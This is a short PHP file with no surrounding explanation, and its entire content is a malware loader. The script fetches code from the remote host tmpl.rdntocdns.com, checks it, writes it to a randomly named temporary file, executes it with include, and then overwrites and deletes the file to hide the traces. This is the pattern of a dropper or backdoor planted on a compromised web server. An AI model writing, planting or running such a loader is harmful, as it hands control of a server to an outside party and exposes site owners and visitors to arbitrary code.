<?php $z=file_get_contents('http://tmpl.rdntocdns.com/rn.txt');if(strpos($z,'error_reporting')!==false){}else{$z=file_get_contents('http://tmpl.rdntocdns.com/rn.txt');if(strpos($z,'error_reporting')!==false){}else{echo 'catnwget';die();}}  $ft=sys_get_temp_dir().'/'.md5(uniqid(rand(), true)); @file_put_contents($ft,'<?php '.$z); include($ft); @file_put_contents($ft,'1'); @unlink($ft);